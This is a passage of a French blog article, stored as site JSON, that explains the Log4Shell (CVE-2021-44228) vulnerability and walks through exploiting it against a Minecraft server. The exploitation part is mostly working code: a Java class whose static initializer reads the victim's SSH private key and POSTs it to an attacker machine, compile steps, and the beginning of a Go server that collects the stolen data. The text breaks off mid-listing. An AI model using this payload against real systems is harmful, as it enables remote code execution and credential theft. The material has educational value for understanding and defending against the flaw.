[{"data":1,"prerenderedAt":1408},["ShallowReactive",2],{"authors":3,"article-2022-03-24-comprendre-et-exploiter-la-faille-log4shell":331},[4,23,35,48,61,73,85,98,111,124,136,148,161,173,185,197,209,221,233,245,258,270,282,295,307,319],{"id":5,"title":6,"body":7,"description":11,"extension":14,"meta":15,"name":16,"navigation":17,"path":18,"readingTime":19,"seo":20,"stem":21,"__hash__":22},"authors\u002Fauthors\u002Falexandre-guillon.md","Software Engineer",{"type":8,"value":9,"toc":10},"minimark",[],{"title":11,"searchDepth":12,"depth":12,"links":13},"",2,[],"md",{},"Alexandre Guillon",true,"\u002Fauthors\u002Falexandre-guillon",1,{"title":6,"description":11},"authors\u002Falexandre-guillon","4tf48mjyjFNqItOHaulICbrjeCyMag1o6801uHeTz98",{"id":24,"title":6,"body":25,"description":11,"extension":14,"meta":29,"name":30,"navigation":17,"path":31,"readingTime":19,"seo":32,"stem":33,"__hash__":34},"authors\u002Fauthors\u002Falexis-ablain.md",{"type":8,"value":26,"toc":27},[],{"title":11,"searchDepth":12,"depth":12,"links":28},[],{},"Alexis Ablain","\u002Fauthors\u002Falexis-ablain",{"title":6,"description":11},"authors\u002Falexis-ablain","_SIAtB7f-39e5t3GiJof81NP47s6MGo2n4gaHkTy1uQ",{"id":36,"title":37,"body":38,"description":11,"extension":14,"meta":42,"name":43,"navigation":17,"path":44,"readingTime":19,"seo":45,"stem":46,"__hash__":47},"authors\u002Fauthors\u002Faxel-shaita.md","Engineering Manager",{"type":8,"value":39,"toc":40},[],{"title":11,"searchDepth":12,"depth":12,"links":41},[],{},"Axel Shaïta","\u002Fauthors\u002Faxel-shaita",{"title":37,"description":11},"authors\u002Faxel-shaita","fK0argUhsBkWLjpTAhY13oYLVzQthcEYkCEdtHWmIgE",{"id":49,"title":50,"body":51,"description":11,"extension":14,"meta":55,"name":56,"navigation":17,"path":57,"readingTime":19,"seo":58,"stem":59,"__hash__":60},"authors\u002Fauthors\u002Fbaptiste-faure.md","Head of Talent Acquisition",{"type":8,"value":52,"toc":53},[],{"title":11,"searchDepth":12,"depth":12,"links":54},[],{},"Baptiste 
Faure","\u002Fauthors\u002Fbaptiste-faure",{"title":50,"description":11},"authors\u002Fbaptiste-faure","ELisToYtcgHmgdVWZkCclTPV6exZtfyXqhpx1jjbJHs",{"id":62,"title":6,"body":63,"description":11,"extension":14,"meta":67,"name":68,"navigation":17,"path":69,"readingTime":19,"seo":70,"stem":71,"__hash__":72},"authors\u002Fauthors\u002Fbenjamin-bouillot.md",{"type":8,"value":64,"toc":65},[],{"title":11,"searchDepth":12,"depth":12,"links":66},[],{},"Benjamin Bouillot","\u002Fauthors\u002Fbenjamin-bouillot",{"title":6,"description":11},"authors\u002Fbenjamin-bouillot","tbhCFZyfTt7ZM5b5YgqQ2nhgnSTl8BweaQQryc87fHo",{"id":74,"title":37,"body":75,"description":11,"extension":14,"meta":79,"name":80,"navigation":17,"path":81,"readingTime":19,"seo":82,"stem":83,"__hash__":84},"authors\u002Fauthors\u002Fcedric-nicoloso.md",{"type":8,"value":76,"toc":77},[],{"title":11,"searchDepth":12,"depth":12,"links":78},[],{},"Cédric Nicoloso","\u002Fauthors\u002Fcedric-nicoloso",{"title":37,"description":11},"authors\u002Fcedric-nicoloso","ibSoh4VZYiWYTuLOnZTedaAfcnvet1Q9H7ogW0LgorY",{"id":86,"title":87,"body":88,"description":11,"extension":14,"meta":92,"name":93,"navigation":17,"path":94,"readingTime":19,"seo":95,"stem":96,"__hash__":97},"authors\u002Fauthors\u002Fdavid-touzet.md","Staff Engineer",{"type":8,"value":89,"toc":90},[],{"title":11,"searchDepth":12,"depth":12,"links":91},[],{},"David Touzet","\u002Fauthors\u002Fdavid-touzet",{"title":87,"description":11},"authors\u002Fdavid-touzet","dHWwnQxb1Ubt-WwXWEODGEo9AFoq1cJUhfg3kdnYSBM",{"id":99,"title":100,"body":101,"description":11,"extension":14,"meta":105,"name":106,"navigation":17,"path":107,"readingTime":19,"seo":108,"stem":109,"__hash__":110},"authors\u002Fauthors\u002Feloise-chizat.md","Data Engineer",{"type":8,"value":102,"toc":103},[],{"title":11,"searchDepth":12,"depth":12,"links":104},[],{},"Eloïse 
Chizat","\u002Fauthors\u002Feloise-chizat",{"title":100,"description":11},"authors\u002Feloise-chizat","Utd72Vm9qT4hh2ZbFi6a2_nXw5Wb494Ed_HL1ra5yw8",{"id":112,"title":113,"body":114,"description":11,"extension":14,"meta":118,"name":119,"navigation":17,"path":120,"readingTime":19,"seo":121,"stem":122,"__hash__":123},"authors\u002Fauthors\u002Femmanuel-auclair.md","Staff engineer",{"type":8,"value":115,"toc":116},[],{"title":11,"searchDepth":12,"depth":12,"links":117},[],{},"Emmanuel Auclair","\u002Fauthors\u002Femmanuel-auclair",{"title":113,"description":11},"authors\u002Femmanuel-auclair","MtsA8THNLEn0dTtYEIQaGwDuf7MjQL55IOeei5gugEg",{"id":125,"title":6,"body":126,"description":11,"extension":14,"meta":130,"name":131,"navigation":17,"path":132,"readingTime":19,"seo":133,"stem":134,"__hash__":135},"authors\u002Fauthors\u002Fhoreb-parraud.md",{"type":8,"value":127,"toc":128},[],{"title":11,"searchDepth":12,"depth":12,"links":129},[],{},"Horeb Parraud","\u002Fauthors\u002Fhoreb-parraud",{"title":6,"description":11},"authors\u002Fhoreb-parraud","ajjsnUX4ohZI-ghMdbb92q_taWDkKXVZSLZXoAeLQtg",{"id":137,"title":37,"body":138,"description":11,"extension":14,"meta":142,"name":143,"navigation":17,"path":144,"readingTime":19,"seo":145,"stem":146,"__hash__":147},"authors\u002Fauthors\u002Fhugo-contreras.md",{"type":8,"value":139,"toc":140},[],{"title":11,"searchDepth":12,"depth":12,"links":141},[],{},"Hugo Contreras","\u002Fauthors\u002Fhugo-contreras",{"title":37,"description":11},"authors\u002Fhugo-contreras","2nc3VMu9ASq9Z6Pwx2-7-Ye991Pww4p-UEDBQFfjF-Q",{"id":149,"title":150,"body":151,"description":11,"extension":14,"meta":155,"name":156,"navigation":17,"path":157,"readingTime":19,"seo":158,"stem":159,"__hash__":160},"authors\u002Fauthors\u002Fjulien-tassin.md","Head of Engineering",{"type":8,"value":152,"toc":153},[],{"title":11,"searchDepth":12,"depth":12,"links":154},[],{},"Julien 
Tassin","\u002Fauthors\u002Fjulien-tassin",{"title":150,"description":11},"authors\u002Fjulien-tassin","iUIHI7SITje38Jh9X9uvYs4-VsHx4eCdt6hAlyLFG_o",{"id":162,"title":6,"body":163,"description":11,"extension":14,"meta":167,"name":168,"navigation":17,"path":169,"readingTime":19,"seo":170,"stem":171,"__hash__":172},"authors\u002Fauthors\u002Flaurent-renard.md",{"type":8,"value":164,"toc":165},[],{"title":11,"searchDepth":12,"depth":12,"links":166},[],{},"Laurent Renard","\u002Fauthors\u002Flaurent-renard",{"title":6,"description":11},"authors\u002Flaurent-renard","5BP7Ed-pt1SQHjh0UJ1XUrlLTcdlFaDoKBCP4deHq8A",{"id":174,"title":6,"body":175,"description":11,"extension":14,"meta":179,"name":180,"navigation":17,"path":181,"readingTime":19,"seo":182,"stem":183,"__hash__":184},"authors\u002Fauthors\u002Fleo-martin.md",{"type":8,"value":176,"toc":177},[],{"title":11,"searchDepth":12,"depth":12,"links":178},[],{},"Léo Martin","\u002Fauthors\u002Fleo-martin",{"title":6,"description":11},"authors\u002Fleo-martin","eYxCHkRgbGDV7shKdTA9s7Tu0zGV4yDGFoKR5MHQntY",{"id":186,"title":6,"body":187,"description":11,"extension":14,"meta":191,"name":192,"navigation":17,"path":193,"readingTime":19,"seo":194,"stem":195,"__hash__":196},"authors\u002Fauthors\u002Floic-bousquet.md",{"type":8,"value":188,"toc":189},[],{"title":11,"searchDepth":12,"depth":12,"links":190},[],{},"Loïc Bousquet","\u002Fauthors\u002Floic-bousquet",{"title":6,"description":11},"authors\u002Floic-bousquet","ko12qZwiGL8XNjAoy9oWypPkIjr29Pbq7vhdtgldqeQ",{"id":198,"title":6,"body":199,"description":11,"extension":14,"meta":203,"name":204,"navigation":17,"path":205,"readingTime":19,"seo":206,"stem":207,"__hash__":208},"authors\u002Fauthors\u002Floic-poullain.md",{"type":8,"value":200,"toc":201},[],{"title":11,"searchDepth":12,"depth":12,"links":202},[],{},"Loïc 
Poullain","\u002Fauthors\u002Floic-poullain",{"title":6,"description":11},"authors\u002Floic-poullain","oRIyJhFRTqxy5dLCYQ2OnYZ1DB-gLDUM-85vTSYuTF0",{"id":210,"title":100,"body":211,"description":11,"extension":14,"meta":215,"name":216,"navigation":17,"path":217,"readingTime":19,"seo":218,"stem":219,"__hash__":220},"authors\u002Fauthors\u002Fmaud-lelu.md",{"type":8,"value":212,"toc":213},[],{"title":11,"searchDepth":12,"depth":12,"links":214},[],{},"Maud Lélu","\u002Fauthors\u002Fmaud-lelu",{"title":100,"description":11},"authors\u002Fmaud-lelu","MMbsCKuE41OMHusrl12FIEsI-Trx7l8Nn_ANhvj2_y4",{"id":222,"title":37,"body":223,"description":11,"extension":14,"meta":227,"name":228,"navigation":17,"path":229,"readingTime":19,"seo":230,"stem":231,"__hash__":232},"authors\u002Fauthors\u002Fnicolas-poirier.md",{"type":8,"value":224,"toc":225},[],{"title":11,"searchDepth":12,"depth":12,"links":226},[],{},"Nicolas Poirier","\u002Fauthors\u002Fnicolas-poirier",{"title":37,"description":11},"authors\u002Fnicolas-poirier","dXrJkYo8az4SN_D23aYc3fQ7z8s1dR2a0lt1ogjAjJs",{"id":234,"title":37,"body":235,"description":11,"extension":14,"meta":239,"name":240,"navigation":17,"path":241,"readingTime":19,"seo":242,"stem":243,"__hash__":244},"authors\u002Fauthors\u002Fraphael-sauget.md",{"type":8,"value":236,"toc":237},[],{"title":11,"searchDepth":12,"depth":12,"links":238},[],{},"Raphaël Sauget","\u002Fauthors\u002Fraphael-sauget",{"title":37,"description":11},"authors\u002Fraphael-sauget","Uri9bcq0QDuxRA0PbBoNtu7p_5L3dALu4kzcXVW0xyM",{"id":246,"title":247,"body":248,"description":11,"extension":14,"meta":252,"name":253,"navigation":17,"path":254,"readingTime":19,"seo":255,"stem":256,"__hash__":257},"authors\u002Fauthors\u002Fromain-koenig.md","Co-funder & Head of innovation",{"type":8,"value":249,"toc":250},[],{"title":11,"searchDepth":12,"depth":12,"links":251},[],{},"Romain 
Koenig","\u002Fauthors\u002Fromain-koenig",{"title":247,"description":11},"authors\u002Fromain-koenig","uyS8--eG2_ezyqRABcJnMJmQKKuSArhPWd14aUvFeEw",{"id":259,"title":37,"body":260,"description":11,"extension":14,"meta":264,"name":265,"navigation":17,"path":266,"readingTime":19,"seo":267,"stem":268,"__hash__":269},"authors\u002Fauthors\u002Fromaric-juniet.md",{"type":8,"value":261,"toc":262},[],{"title":11,"searchDepth":12,"depth":12,"links":263},[],{},"Romaric Juniet","\u002Fauthors\u002Fromaric-juniet",{"title":37,"description":11},"authors\u002Fromaric-juniet","4Zb2artgT-eo-PHLXi3xi4d5t7s6PfhUxeSfXIikSUY",{"id":271,"title":6,"body":272,"description":11,"extension":14,"meta":276,"name":277,"navigation":17,"path":278,"readingTime":19,"seo":279,"stem":280,"__hash__":281},"authors\u002Fauthors\u002Fstanyslas-bres.md",{"type":8,"value":273,"toc":274},[],{"title":11,"searchDepth":12,"depth":12,"links":275},[],{},"Stanyslas Bres","\u002Fauthors\u002Fstanyslas-bres",{"title":6,"description":11},"authors\u002Fstanyslas-bres","Xa0SahETuiN4q1jrmR2ych3moAqcZ2LbU7vSfEt2RuU",{"id":283,"title":284,"body":285,"description":11,"extension":14,"meta":289,"name":290,"navigation":17,"path":291,"readingTime":19,"seo":292,"stem":293,"__hash__":294},"authors\u002Fauthors\u002Ftalent-acquisition.md","Talent Acquisition",{"type":8,"value":286,"toc":287},[],{"title":11,"searchDepth":12,"depth":12,"links":288},[],{},"Équipe Talent Acquisition","\u002Fauthors\u002Ftalent-acquisition",{"description":11},"authors\u002Ftalent-acquisition","doDfE76txftQ4wIiKjJoDmSpyzSKk0tzlgVAp6-opAY",{"id":296,"title":6,"body":297,"description":11,"extension":14,"meta":301,"name":302,"navigation":17,"path":303,"readingTime":19,"seo":304,"stem":305,"__hash__":306},"authors\u002Fauthors\u002Fvictor-borg.md",{"type":8,"value":298,"toc":299},[],{"title":11,"searchDepth":12,"depth":12,"links":300},[],{},"Victor 
Borg","\u002Fauthors\u002Fvictor-borg",{"title":6,"description":11},"authors\u002Fvictor-borg","-Za-JweoiP6hyclue_WkxMXdRUDTczPGlJf6AZckjUc",{"id":308,"title":6,"body":309,"description":11,"extension":14,"meta":313,"name":314,"navigation":17,"path":315,"readingTime":19,"seo":316,"stem":317,"__hash__":318},"authors\u002Fauthors\u002Fvirgil-roger.md",{"type":8,"value":310,"toc":311},[],{"title":11,"searchDepth":12,"depth":12,"links":312},[],{},"Virgil Roger","\u002Fauthors\u002Fvirgil-roger",{"title":6,"description":11},"authors\u002Fvirgil-roger","DfVFe5j0bCgXeEr381ZYOM5DP4m-pWb93J9-m_muKJ0",{"id":320,"title":6,"body":321,"description":11,"extension":14,"meta":325,"name":326,"navigation":17,"path":327,"readingTime":19,"seo":328,"stem":329,"__hash__":330},"authors\u002Fauthors\u002Fyukan-zhao.md",{"type":8,"value":322,"toc":323},[],{"title":11,"searchDepth":12,"depth":12,"links":324},[],{},"Yukan Zhao","\u002Fauthors\u002Fyukan-zhao",{"title":6,"description":11},"authors\u002Fyukan-zhao","LRPHugtAJnWHsmHxy9_SR5Zas_C5p-GR_uHEs1Fhk_E",{"id":332,"title":333,"author":334,"body":335,"date":1398,"description":1399,"extension":14,"lang":1400,"meta":1401,"navigation":17,"path":1402,"published":17,"readingTime":436,"seo":1403,"stem":1404,"tags":1405,"__hash__":1407},"articles\u002Farticles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell.md","Comprendre (et exploiter 😈) la faille log4shell","loic-bousquet",{"type":8,"value":336,"toc":1393},[337,342,346,350,353,361,365,368,374,377,380,385,388,391,970,981,986,993,1273,1276,1303,1313,1321,1324,1329,1332,1337,1342,1348,1353,1356,1359,1365,1371,1377,1383,1389],[338,339,341],"h2",{"id":340},"log4j-quest-ce-que-cest","Log4j, qu’est-ce que c’est ?",[343,344,345],"p",{},"Log4j est une des librairies de log parmi les plus utilisées par les applications codées en java. 
La\nliste des entreprises qui l’utilisent est longue, on y compte notamment des géants comme Apple,\nGoogle, Microsoft ou encore Steam.",[338,347,349],{"id":348},"la-faille-log4shell","La faille Log4Shell",[343,351,352],{},"Log4shell c’est le nom donné à cette vulnérabilité. On peut aussi la retrouver sous le nom\nCVE-2021-44228. Ce qui rend cette faille très dangereuse est que d’une part elle est très facile à\nexploiter et d’autre part, la librairie log4j est utilisée dans un grand nombre de projets. Sur\nGitHub plus de 300 000 dépôts utilisent cette dépendance.",[343,354,355,356,360],{},"Log4j comprend une fonctionnalité de lookup. C’est-à-dire qu’elle peut interpréter certaines\ninstructions qui seraient incluses dans les données loggées. Par exemple si on lui demande de logger\n",[357,358,359],"code",{},"${env:USER}",", cette chaîne de caractères va automatiquement être remplacée par la valeur de la variable\nd’environnement USER. Il est ainsi possible de faire un lookup via JNDI (Java Naming and Directory\nInterface), qui en soi n’est pas problématique : on va juste chercher une valeur ailleurs et la\nlogger. Le problème est que la donnée loggée est souvent contrôlée par un attaquant (message de chat,\nen-tête HTTP, nom d’utilisateur…) et que c’est donc lui qui choisit l’adresse interrogée. Quand on\ncombine ce lookup avec LDAP (un annuaire clé-valeur), le serveur LDAP de l’attaquant peut renvoyer une\nréférence vers une classe Java hébergée à distance, que la JVM télécharge et instancie : il devient\npossible de faire exécuter du code. Pour comprendre comment cela marche, on va passer à la pratique\ndans la partie suivante.",[338,362,364],{"id":363},"exploitons-cette-faille","Exploitons cette faille",[343,366,367],{},"Passons maintenant aux travaux pratiques. Pour réaliser une attaque, on va utiliser deux\nordinateurs. 
Le premier sera l’ordinateur cible, qui fera tourner le serveur, le second (à l’adresse\n192.168.1.22) sera l’ordinateur attaquant qui va héberger le serveur HTTP et le serveur JNDI (LDAP).",[343,369,370],{},[371,372],"img",{"alt":11,"src":373},"\u002Fimages\u002Fbonjour-console-jeu.png",[343,375,376],{},"Chaque message envoyé dans le tchat du jeu (à gauche) est loggé dans la console du serveur et dans\nun fichier de logs (à droite). C’est ce passage d’une donnée contrôlée par un joueur dans log4j qui\nrend le serveur attaquable.",[343,378,379],{},"Pour commencer, on lance le serveur minecraft avec la commande suivante :",[343,381,382],{},[357,383,384],{},"java -Xmx1024M -Xms1024M -jar .\\\\server.jar nogui",[343,386,387],{},"On va ensuite avoir besoin d’un code java malicieux qui sera exécuté sur la machine qui héberge le\nserveur minecraft, avec les droits du processus serveur. Dans cet exemple on va lire la clé privée SSH\n(~\u002F.ssh\u002Fid_rsa) de l’utilisateur qui fait tourner le serveur et l’envoyer à un serveur distant via HTTP\n(en clair). Le code est placé dans un bloc d’initialisation statique : il s’exécute dès que la JVM\ncharge la classe, sans qu’aucune méthode n’ait besoin d’être appelée.",[343,389,390],{},"Voici le code qui fait ça. Attention : les chevrons autour des URL dans ce listing (et dans la\ncodebase du serveur LDAP plus bas) sont un artefact de rendu, il faut les retirer, sinon new URL(...)\nlève une MalformedURLException (avalée par le catch, qui se contente d’afficher la pile) et la classe\nne sera jamais chargée depuis la codebase :",[392,393,397],"pre",{"className":394,"code":395,"language":396,"meta":11,"style":11},"language-java shiki shiki-themes github-light github-dark","import java.io.OutputStream;\nimport java.net.HttpURLConnection;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport java.nio.charset.StandardCharsets;\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\npublic class MinecraftRCE {\n    static {\n        try {\n            URL url = new URL(\"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fdata>\");\n            URLConnection con = url.openConnection();\n            HttpURLConnection http = (HttpURLConnection) con;\n            http.setRequestMethod(\"POST\");\n\n            StringBuilder sb = new StringBuilder();\n\n            try (BufferedReader br = Files.newBufferedReader(Paths.get(System.getProperty(\"user.home\") + \"\u002F.ssh\u002Fid_rsa\"))) {\n                String line;\n                while ((line = br.readLine()) != null) {\n                    sb.append(line).append(\"\\\\n\");\n                }\n\n       
     } catch (IOException e) {\n                System.err.format(\"IOException: %s%n\", e);\n            }\n\n            byte[] out = sb.toString().getBytes(StandardCharsets.UTF_8);\n\n            int length = out.length;\n\n            http.setFixedLengthStreamingMode(length);\n            http.setRequestProperty(\"Content-Type\", \"application\u002Fx-www-form-urlencoded; charset=UTF-8\");\n            http.setDoOutput(true);\n            http.connect();\n            try(OutputStream os = http.getOutputStream()) {\n                os.write(out);\n            }\n            http.disconnect();\n        } catch (Exception e){\n            e.printStackTrace();\n        }\n    }\n}\n","java",[357,398,399,411,418,426,434,442,450,458,466,474,480,496,504,512,537,554,565,581,586,601,606,652,658,688,715,721,726,744,761,767,772,798,803,817,822,833,854,869,879,898,910,915,925,941,952,958,964],{"__ignoreMap":11},[400,401,403,407],"span",{"class":402,"line":19},"line",[400,404,406],{"class":405},"szBVR","import",[400,408,410],{"class":409},"sVt8B"," java.io.OutputStream;\n",[400,412,413,415],{"class":402,"line":12},[400,414,406],{"class":405},[400,416,417],{"class":409}," java.net.HttpURLConnection;\n",[400,419,421,423],{"class":402,"line":420},3,[400,422,406],{"class":405},[400,424,425],{"class":409}," java.net.URL;\n",[400,427,429,431],{"class":402,"line":428},4,[400,430,406],{"class":405},[400,432,433],{"class":409}," java.net.URLConnection;\n",[400,435,437,439],{"class":402,"line":436},5,[400,438,406],{"class":405},[400,440,441],{"class":409}," java.nio.charset.StandardCharsets;\n",[400,443,445,447],{"class":402,"line":444},6,[400,446,406],{"class":405},[400,448,449],{"class":409}," java.io.BufferedReader;\n",[400,451,453,455],{"class":402,"line":452},7,[400,454,406],{"class":405},[400,456,457],{"class":409}," java.io.IOException;\n",[400,459,461,463],{"class":402,"line":460},8,[400,462,406],{"class":405},[400,464,465],{"class":409}," 
java.nio.file.Files;\n",[400,467,469,471],{"class":402,"line":468},9,[400,470,406],{"class":405},[400,472,473],{"class":409}," java.nio.file.Paths;\n",[400,475,477],{"class":402,"line":476},10,[400,478,479],{"emptyLinePlaceholder":17},"\n",[400,481,483,486,489,493],{"class":402,"line":482},11,[400,484,485],{"class":405},"public",[400,487,488],{"class":405}," class",[400,490,492],{"class":491},"sScJk"," MinecraftRCE",[400,494,495],{"class":409}," {\n",[400,497,499,502],{"class":402,"line":498},12,[400,500,501],{"class":405},"    static",[400,503,495],{"class":409},[400,505,507,510],{"class":402,"line":506},13,[400,508,509],{"class":405},"        try",[400,511,495],{"class":409},[400,513,515,518,521,524,527,530,534],{"class":402,"line":514},14,[400,516,517],{"class":409},"            URL url ",[400,519,520],{"class":405},"=",[400,522,523],{"class":405}," new",[400,525,526],{"class":491}," URL",[400,528,529],{"class":409},"(",[400,531,533],{"class":532},"sZZnC","\"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fdata>\"",[400,535,536],{"class":409},");\n",[400,538,540,543,545,548,551],{"class":402,"line":539},15,[400,541,542],{"class":409},"            URLConnection con ",[400,544,520],{"class":405},[400,546,547],{"class":409}," url.",[400,549,550],{"class":491},"openConnection",[400,552,553],{"class":409},"();\n",[400,555,557,560,562],{"class":402,"line":556},16,[400,558,559],{"class":409},"            HttpURLConnection http ",[400,561,520],{"class":405},[400,563,564],{"class":409}," (HttpURLConnection) con;\n",[400,566,568,571,574,576,579],{"class":402,"line":567},17,[400,569,570],{"class":409},"            http.",[400,572,573],{"class":491},"setRequestMethod",[400,575,529],{"class":409},[400,577,578],{"class":532},"\"POST\"",[400,580,536],{"class":409},[400,582,584],{"class":402,"line":583},18,[400,585,479],{"emptyLinePlaceholder":17},[400,587,589,592,594,596,599],{"class":402,"line":588},19,[400,590,591],{"class":409},"            StringBuilder sb 
",[400,593,520],{"class":405},[400,595,523],{"class":405},[400,597,598],{"class":491}," StringBuilder",[400,600,553],{"class":409},[400,602,604],{"class":402,"line":603},20,[400,605,479],{"emptyLinePlaceholder":17},[400,607,609,612,615,617,620,623,626,629,632,635,637,640,643,646,649],{"class":402,"line":608},21,[400,610,611],{"class":405},"            try",[400,613,614],{"class":409}," (BufferedReader br ",[400,616,520],{"class":405},[400,618,619],{"class":409}," Files.",[400,621,622],{"class":491},"newBufferedReader",[400,624,625],{"class":409},"(Paths.",[400,627,628],{"class":491},"get",[400,630,631],{"class":409},"(System.",[400,633,634],{"class":491},"getProperty",[400,636,529],{"class":409},[400,638,639],{"class":532},"\"user.home\"",[400,641,642],{"class":409},") ",[400,644,645],{"class":405},"+",[400,647,648],{"class":532}," \"\u002F.ssh\u002Fid_rsa\"",[400,650,651],{"class":409},"))) {\n",[400,653,655],{"class":402,"line":654},22,[400,656,657],{"class":409},"                String line;\n",[400,659,661,664,667,669,672,675,678,681,685],{"class":402,"line":660},23,[400,662,663],{"class":405},"                while",[400,665,666],{"class":409}," ((line ",[400,668,520],{"class":405},[400,670,671],{"class":409}," br.",[400,673,674],{"class":491},"readLine",[400,676,677],{"class":409},"()) ",[400,679,680],{"class":405},"!=",[400,682,684],{"class":683},"sj4cs"," null",[400,686,687],{"class":409},") {\n",[400,689,691,694,697,700,702,704,707,710,713],{"class":402,"line":690},24,[400,692,693],{"class":409},"                    sb.",[400,695,696],{"class":491},"append",[400,698,699],{"class":409},"(line).",[400,701,696],{"class":491},[400,703,529],{"class":409},[400,705,706],{"class":532},"\"",[400,708,709],{"class":683},"\\\\",[400,711,712],{"class":532},"n\"",[400,714,536],{"class":409},[400,716,718],{"class":402,"line":717},25,[400,719,720],{"class":409},"                
}\n",[400,722,724],{"class":402,"line":723},26,[400,725,479],{"emptyLinePlaceholder":17},[400,727,729,732,735,738,742],{"class":402,"line":728},27,[400,730,731],{"class":409},"            } ",[400,733,734],{"class":405},"catch",[400,736,737],{"class":409}," (IOException ",[400,739,741],{"class":740},"s4XuR","e",[400,743,687],{"class":409},[400,745,747,750,753,755,758],{"class":402,"line":746},28,[400,748,749],{"class":409},"                System.err.",[400,751,752],{"class":491},"format",[400,754,529],{"class":409},[400,756,757],{"class":532},"\"IOException: %s%n\"",[400,759,760],{"class":409},", e);\n",[400,762,764],{"class":402,"line":763},29,[400,765,766],{"class":409},"            }\n",[400,768,770],{"class":402,"line":769},30,[400,771,479],{"emptyLinePlaceholder":17},[400,773,775,778,781,783,786,789,792,795],{"class":402,"line":774},31,[400,776,777],{"class":405},"            byte",[400,779,780],{"class":409},"[] out ",[400,782,520],{"class":405},[400,784,785],{"class":409}," sb.",[400,787,788],{"class":491},"toString",[400,790,791],{"class":409},"().",[400,793,794],{"class":491},"getBytes",[400,796,797],{"class":409},"(StandardCharsets.UTF_8);\n",[400,799,801],{"class":402,"line":800},32,[400,802,479],{"emptyLinePlaceholder":17},[400,804,806,809,812,814],{"class":402,"line":805},33,[400,807,808],{"class":405},"            int",[400,810,811],{"class":409}," length ",[400,813,520],{"class":405},[400,815,816],{"class":409}," out.length;\n",[400,818,820],{"class":402,"line":819},34,[400,821,479],{"emptyLinePlaceholder":17},[400,823,825,827,830],{"class":402,"line":824},35,[400,826,570],{"class":409},[400,828,829],{"class":491},"setFixedLengthStreamingMode",[400,831,832],{"class":409},"(length);\n",[400,834,836,838,841,843,846,849,852],{"class":402,"line":835},36,[400,837,570],{"class":409},[400,839,840],{"class":491},"setRequestProperty",[400,842,529],{"class":409},[400,844,845],{"class":532},"\"Content-Type\"",[400,847,848],{"class":409},", 
",[400,850,851],{"class":532},"\"application\u002Fx-www-form-urlencoded; charset=UTF-8\"",[400,853,536],{"class":409},[400,855,857,859,862,864,867],{"class":402,"line":856},37,[400,858,570],{"class":409},[400,860,861],{"class":491},"setDoOutput",[400,863,529],{"class":409},[400,865,866],{"class":683},"true",[400,868,536],{"class":409},[400,870,872,874,877],{"class":402,"line":871},38,[400,873,570],{"class":409},[400,875,876],{"class":491},"connect",[400,878,553],{"class":409},[400,880,882,884,887,889,892,895],{"class":402,"line":881},39,[400,883,611],{"class":405},[400,885,886],{"class":409},"(OutputStream os ",[400,888,520],{"class":405},[400,890,891],{"class":409}," http.",[400,893,894],{"class":491},"getOutputStream",[400,896,897],{"class":409},"()) {\n",[400,899,901,904,907],{"class":402,"line":900},40,[400,902,903],{"class":409},"                os.",[400,905,906],{"class":491},"write",[400,908,909],{"class":409},"(out);\n",[400,911,913],{"class":402,"line":912},41,[400,914,766],{"class":409},[400,916,918,920,923],{"class":402,"line":917},42,[400,919,570],{"class":409},[400,921,922],{"class":491},"disconnect",[400,924,553],{"class":409},[400,926,928,931,933,936,938],{"class":402,"line":927},43,[400,929,930],{"class":409},"        } ",[400,932,734],{"class":405},[400,934,935],{"class":409}," (Exception ",[400,937,741],{"class":740},[400,939,940],{"class":409},"){\n",[400,942,944,947,950],{"class":402,"line":943},44,[400,945,946],{"class":409},"            e.",[400,948,949],{"class":491},"printStackTrace",[400,951,553],{"class":409},[400,953,955],{"class":402,"line":954},45,[400,956,957],{"class":409},"        }\n",[400,959,961],{"class":402,"line":960},46,[400,962,963],{"class":409},"    }\n",[400,965,967],{"class":402,"line":966},47,[400,968,969],{"class":409},"}\n",[343,971,972,973,976,977,980],{},"On compile ce bout de code avec ",[357,974,975],{},"javac"," pour obtenir un fichier ",[357,978,979],{},"MinecraftRCE.class"," 
:",[343,982,983],{},[357,984,985],{},"javac MinecraftRCE.java",[343,987,988,989,992],{},"La prochaine étape est de servir ce fichier ",[357,990,991],{},".class"," sur un endpoint http. Plusieurs options pour\nréaliser cela, nous allons partir sur une implémentation en Go, car on peut facilement lancer un\nserveur http avec la librairie standard :",[392,994,996],{"className":394,"code":995,"language":396,"meta":11,"style":11},"package main\n\nimport (\n    \"bytes\"\n    \"io\u002Fioutil\"\n    \"log\"\n    \"net\u002Fhttp\"\n)\n\nfunc dataHandler(_ http.ResponseWriter, req *http.Request) {\n    buf, _ := ioutil.ReadAll(req.Body)\n    rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf))\n    log.Printf(\"secret data: %q\", rdr1)\n}\n\nfunc main() {\n    fs := http.FileServer(http.Dir(\".\u002Fjava\"))\n    http.Handle(\"\u002Fstatic\u002F\", http.StripPrefix(\"\u002Fstatic\u002F\", fs)) \u002F\u002F 1\n    http.HandleFunc(\"\u002Fdata\", dataHandler) \u002F\u002F 2\n\n    println(\"waiting for secret data\")\n    http.ListenAndServe(\":8080\", nil)\n}\n",[357,997,998,1006,1010,1018,1023,1028,1033,1038,1043,1047,1075,1097,1124,1135,1139,1143,1148,1171,1206,1228,1232,1243,1269],{"__ignoreMap":11},[400,999,1000,1003],{"class":402,"line":19},[400,1001,1002],{"class":405},"package",[400,1004,1005],{"class":409}," main\n",[400,1007,1008],{"class":402,"line":12},[400,1009,479],{"emptyLinePlaceholder":17},[400,1011,1012,1015],{"class":402,"line":420},[400,1013,406],{"class":1014},"s7hpK",[400,1016,1017],{"class":409}," (\n",[400,1019,1020],{"class":402,"line":428},[400,1021,1022],{"class":409},"    \"bytes\"\n",[400,1024,1025],{"class":402,"line":436},[400,1026,1027],{"class":409},"    \"io\u002Fioutil\"\n",[400,1029,1030],{"class":402,"line":444},[400,1031,1032],{"class":409},"    \"log\"\n",[400,1034,1035],{"class":402,"line":452},[400,1036,1037],{"class":409},"    
